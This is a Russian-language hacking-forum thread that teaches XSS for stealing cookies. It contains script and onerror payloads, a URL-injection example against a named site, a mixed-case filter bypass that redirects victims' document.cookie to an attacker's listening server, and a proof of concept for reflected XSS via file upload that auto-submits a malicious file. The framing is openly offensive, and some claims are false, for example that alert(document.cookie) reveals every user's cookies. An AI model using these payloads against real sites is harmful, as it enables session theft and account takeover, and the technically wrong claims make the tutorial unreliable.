Интересно XSS, или как получить халявные cookie Ч1.

Che Browser Antidetect
Сервисы от NOVA
9

9779

Original poster
XSS, или как получить халявные cookie
1623090620566.png
XSS - опаснейшая уязвимость веб приложений по мнению ведущих it империй и крупных лабораторий кибербезопасности.
qwasp, google, mozilla, apple, kaspersky, и многие другие нанимают целые кибервойска для защиты своих систем.
а нам че, а мы научимся)
на каждом сайте в интернете есть поля ввода, input'ы . и на многих сайтах есть критическая уязвимость, с помощью которой можно задавать js команды прямо в input. пример такой атаки:

<script>alert('9779')</script>

вместо алерта можно вставить любой js код,. но это только начало. если скрипт выше не сработает, попробуем еще один способ. есть у нас условный месcенджер, и он нам до жути не нравится. можно применить такую штуку:

<img src="/" anerror="alert('done')"/>

кстати, строка ввода url тоже считается за input поэтому можно применить вот такую штуку(на момент окончания написания мануала уязвимость была погашенна)

https://otvetkin.info'onerror="alert('done');"

Круто, да? но что нам дают эти алерты?
А теперь поговорим про куки)

alert(document.cookie);

при вводе этого, мы получаем куки всех пользователей на сервере, и нам выбросится уведомление с ними. но можно отсортировать поиск:

JavaScript:
document.cookie = "user=John";
alert(document.cookie);
вы увидите огромное количество куков, я уверяю.
// специальные символы (пробелы), требуется кодирование
let name = "my name";
let value = "John Smith"

// кодирует в my%20name=John%20Smith
document.cookie = encodeURIComponent(name) + '=' + encodeURIComponent(value);

alert(document.cookie); // ...; my%20name=John%20Smith

Надеюсь, что вам понравилась статья, и вы ее дочитали))
Вопросы По статье писать @Pickmoonpeek или @notAHackerRealy в телеграм
Скоро 2 часть!)
 
  • Like
Реакции: Admin
A

AngelXXXanax

Original poster
XSS, или как получить халявные cookie
Посмотреть вложение 5442
XSS - опаснейшая уязвимость веб приложений по мнению ведущих it империй и крупных лабораторий кибербезопасности.
qwasp, google, mozilla, apple, kaspersky, и многие другие нанимают целые кибервойска для защиты своих систем.
а нам че, а мы научимся)
на каждом сайте в интернете есть поля ввода, input'ы . и на многих сайтах есть критическая уязвимость, с помощью которой можно задавать js команды прямо в input. пример такой атаки:

<script>alert('9779')</script>

вместо алерта можно вставить любой js код,. но это только начало. если скрипт выше не сработает, попробуем еще один способ. есть у нас условный месcенджер, и он нам до жути не нравится. можно применить такую штуку:

<img src="/" anerror="alert('done')"/>

кстати, строка ввода url тоже считается за input поэтому можно применить вот такую штуку(на момент окончания написания мануала уязвимость была погашенна)

https://otvetkin.info'onerror="alert('done');"

Круто, да? но что нам дают эти алерты?
А теперь поговорим про куки)

alert(document.cookie);

при вводе этого, мы получаем куки всех пользователей на сервере, и нам выбросится уведомление с ними. но можно отсортировать поиск:


JavaScript:
document.cookie = "user=John";
alert(document.cookie);
вы увидите огромное количество куков, я уверяю.
// специальные символы (пробелы), требуется кодирование
let name = "my name";
let value = "John Smith"

// кодирует в my%20name=John%20Smith
document.cookie = encodeURIComponent(name) + '=' + encodeURIComponent(value);

alert(document.cookie); // ...; my%20name=John%20Smith

Надеюсь, что вам понравилась статья, и вы ее дочитали))
Вопросы По статье писать @Pickmoonpeek или @notAHackerRealy в телеграм
Скоро 2 часть!)
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

 $isempty = true;

} else {

 echo '<pre>';
 echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
 echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
photo_2021-06-07_17-16-40.jpg
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
photo_2021-06-07_17-24-08.jpg
 
  • Like
Реакции: Admin и 9779
A

AngelXXXanax

Original poster
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
Ещё интересная тема это Reflected XSS via File Upload. На первый взгляд, кажется простой задачей. Но оказывается, что подсунуть пользователю отправку произвольного файла из браузера без действий пользователя не так уж просто. Нам всегда в таком случае надо чтобы пользователь открыл страницу, после из JS создать на странице форму с уже подставленным файлом, и после перенаправить его на уязвимую страницу вместе с загруженными данными. В этом случае ни как не помогут ни XMLHttpRequest, ни fetch, о которых вы сначала могли подумать. Но! Для содержания файлов объект input имеет поле input.files, которое представляет собой объект FileList. И до какого-то времени мы не могли его изменять (он считался immutable) и создавать кастомные FileList объекты, кроме возможности изменять его через объекты полученные из события DataTransferEvent (Т.е. когда юзер сам перетаскивал файлы на экран). Но в 17 году ребята обнаружили возможность вызывать конструктор объекта DataTransfer , который порождает изменяемый объект FileList, который мы можем наполнить своими произвольными файлами из кода JS. Вот простой пример:
JavaScript:
<!DOCTYPE html>
<html>
<body>
 <form id="" action="https://example.com/convert-file" method="POST" enctype="multipart/form-data">
  <input id="file" type="file" name="file"/>
  "/>
 </form>

 <script>
  class _DataTransfer {
    constructor() {
     return new ClipboardEvent("").clipboardData || new DataTransfer();}
  }

  const input = document.querySelector('input');
  const file = new File(['<img onerror="alert(\'Domain: \'+document.domain+\'" src="x" />'],"name.html",{type:"text/html"})

  const dt = new _DataTransfer();

  dt.items.add(file)

  input.files = dt.files;

  document.forms[0].submit();
 </script>
</body>
</html>
 
  • Like
Реакции: Admin и 9779
N

NothingButAnything

Original poster
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
cпасибо, очень интересно
 
9

9779

Original poster
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
опять ты решил доебаться)))) за штуку с php кстати большое спасибо)) я не знал если честно
 
9

9779

Original poster
Но в 17 году ребята обнаружили возможность вызывать конструктор объекта DataTransfer , который порождает изменяемый объект FileList, который мы можем наполнить своими произвольными файлами из кода JS. Вот простой пример:
Это имба получается)
 
Y

Yetawesdev

Original poster
Интересно, благодарочка автору, подробно хотел разобраться)
 
  • Like
Реакции: 9779
S

Slavon65

Original poster
Это на подобие межсайтегового скрипта?
 
X

x2x_

Original poster
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

 $isempty = true;

} else {

 echo '<pre>';
 echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
 echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
<img src="" onerror="alert(1)"> ....?
 
S

Sn1z

Original poster
Интересно, благодарочка автору
 
Название темы
Автор Заголовок Раздел Ответы Дата
F XSS - Сборник инструментов Уязвимости и взлом 0
G Руководство по применению: как обойти XSS-фильтры Полезные статьи 0
K Уроки по XSS: Урок 3. Контексты внедрения XSS Уязвимости и взлом 0
K Уроки по XSS: Урок 2. Скрытая передача данных, перехват нажатия клавиш, изменение внешнего вида сайта, подцепление на BeEF, фишинг, подсказки обхода ф Уязвимости и взлом 0
K Уроки по XSS: Урок 1. Основы XSS и поиск уязвимых к XSS сайтов Уязвимости и взлом 0
G Skipfish - Сканер безопасности веб-приложений для определения XSS, SQL инъекции, а также Shell инъекции Kali Linux 0
X нашел xss , что делать дальше? Вопросы и интересы 0
Admin XSS атаки с помощью Referer'а Уязвимости и взлом 0
I Инжектим скрипт beef используя XSS Полезные статьи 4
Admin Приключения xss векторов в необычных местах Уязвимости и взлом 0
P Golden-Bird.biz XSS Другое 4
Admin Cyber Industries - Активная XSS Уязвимости и взлом 0
Admin Выжимаем максимум пользы от XSS Уязвимости и взлом 1
Admin Hotmail - xss Уязвимости и взлом 0
Admin Mail ru - xss Уязвимости и взлом 1
Support81 Роaring Kitty – легенда или аферист: Microsoft India втянута в мошенническую схему Новости в сети 0
Support81 Хорошев или не Хорошев? Могло ли ФБР ошибиться, связав мужчину с вымогательской империей LockBit Новости в сети 0
B Ищешь прокси или соксы ? Свободное общение и флейм 0
Support81 LockBit или DragonForce? Кибератака на Палау привела IT-специалистов в замешательство Новости в сети 0
Support81 Разведка за кадром, или Аквариум спецслужб Новости в сети 0
Support81 SiCat: революция в поиске эксплойтов или новый инструмент хакеров? Новости в сети 0
Support81 Взлом или небрежность? Код и пароли Binance были доступны на GitHub в течение нескольких месяцев Новости в сети 0
Support81 ТикТок обретает вторую жизнь в России: сбой или новая стратегия? Новости в сети 0
TrashHellSoDomy Интересно Такие точные сведения.. или команды.? Свободное общение и флейм 0
Support81 Важно!!! Создаем свой VPN с защищенным от блокировок протоколом AmneziaWG, или WireGuard на максималках Анонимность и приватность 3
Support81 Обычный новый подписчик или полицейский в гражданском? Новости в сети 0
Support81 UNC4841 — настоящие спецагенты или просто хакеры высокого класса? Новости в сети 0
Support81 Договор ООН о киберпреступности: новые стандарты или орудие репрессий? Новости в сети 0
Support81 Monti и Conti: новая звездная пара в мире кибервымогательств или просто совпадение? Новости в сети 0
Support81 Шифровальщик Wagner: вымогательство, вербовка или пустой звук? Новости в сети 0
Support81 70 миллионов или 10 терабайт информации: чем обернется взлом TSMC для мира микросхем? Новости в сети 0
O Я ищу работу. Мошенничество/афера, денежные мулы или другой бизнес в Турции Ищу работу. Предлагаю свои услуги. 3
P Закрыто Я могу выступить посредником по сделке между моими американцами и вами по покупке чистых или заюзанных доков. Корзина 1
websprojekt Продам Крипто биржа | Crypto exchange для ТТ тимы или индивидуального использования Куплю/Продам 2
olivander Продам ПРОДАЖА или ОТРАБОТКА APIKEY/SECRETKEY + скрипт Автовывода приватников Финансы - биллинги, банки, кошельки, логи 1
Protectron Нужна консультация действующего(предпочтительнее) или бывшего банковского работника Ищу работу. Предлагаю свои услуги. 0
M На проверке Заказать Комментарии - Отзывы в Telegram Канал или Чат Ищу работу. Предлагаю свои услуги. 2
V Куплю Ищу ТОО или ИП Казахстан Куплю/Продам 1
D Как поставить лайк? или убрать хайд? может ли не показываться кнопка лайка? Вопросы и интересы 7
P Закрыто Продаю юзанные комплекты(права,айди карты с двух сторон) по Сша без селфи или с селфи Корзина 2
M Германия.В продаже юзанные комплекты вместе с селфи или без селфи(смотрите видео доказательство). Корзина 0
M В продаже юзанные украинские айди карты с двух сторон с селфи или без селфи+прописка(смотрите видео доказательство). Корзина 0
M В продаже юзанные рф комплекты вместе с селфи или без селфи(смотрите видео доказательство). Корзина 0
Z Мне нужно купить веб -оболочку или cpanel Корзина 1
Deni4ka Закрыто Брут акки или акки с токенами от Chaturbate Корзина 2
V Куплю Ищу ТОО или ИП Казахстан Куплю/Продам 1
F Подарок акция до 20000 руб. или месяц бесплатно. Тинькофф Инвестиции. Другое 0
wallet_dat Ожидает оплаты Утерянный или забытый пароль кошельков Bitcoin core Куплю/Продам 111
B Интересно можно ли брутфорсить инстаграм или гмейл в 2022 ? Куплю/Продам 0
DIPHENY Нужен человек с банком Левобережный или Faktura Предоставляю работу. Ищу специалиста. 0

Название темы